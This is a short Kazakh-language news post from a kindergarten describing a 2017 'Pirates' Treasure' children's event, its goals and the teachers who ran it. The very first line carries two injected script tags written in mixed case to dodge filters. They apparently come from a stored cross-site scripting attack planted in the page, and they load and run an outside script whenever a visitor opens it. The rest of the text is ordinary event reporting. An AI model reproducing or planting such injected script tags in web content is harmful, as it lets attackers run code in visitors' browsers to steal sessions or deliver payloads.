<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

09.08.2017

2017 жылы 9 тамыз күгі №7 «Айша»  балабақшасында «Қарақшылар қазынасы» атты ойын-сауық өтті.

Мақсаты: балаларға көтеріңкі көңіл-күй сыйлау, ойын арқылы қимыл-қозғалыс  қабілеттерін дамыту,балаларды жылдамдыққа, шапшаңдыққа,ептілікке, төзімділікке  тәрбиелеу.

Ойын-сауық бақшамыздың барлық балаларына өткізілді.

«Қарақшылар қазынасы» атты ойын-сауықты балабақша тәрбиешілері: Боранбаева А.Т, Кутфенова Г.Қ , Мұстафина Д.Е , Илюбаева С.Т, Сабитова.И.Ж , Хабибулла.Л.Х  және музыка жетекшісі Әсем Бүркітбайқызы ұйымдастырып жүргізді.

Ойын-сауық балаларға  көңілді де, қызықты болды. Балалар әр аралдағы кедергілерден өту арқылы қарақшылардың қазынасына жетуіне көмектесті.

Қарақшылар тапқан қазынасынан  алтын кәмпиттерді балаларға үлестірді.Ойын-сауық соңында балалар ерекше көңіл - күймен  флешмоб биледі. «Балалы үй -базар» дегендей бақшамыздың базары кішкентай бүлдіршіндеріміздің жүзінен күлкі кетпесін!

Просмотров: 410


Пікір қосу



Деректерді қолтаңбаға қосу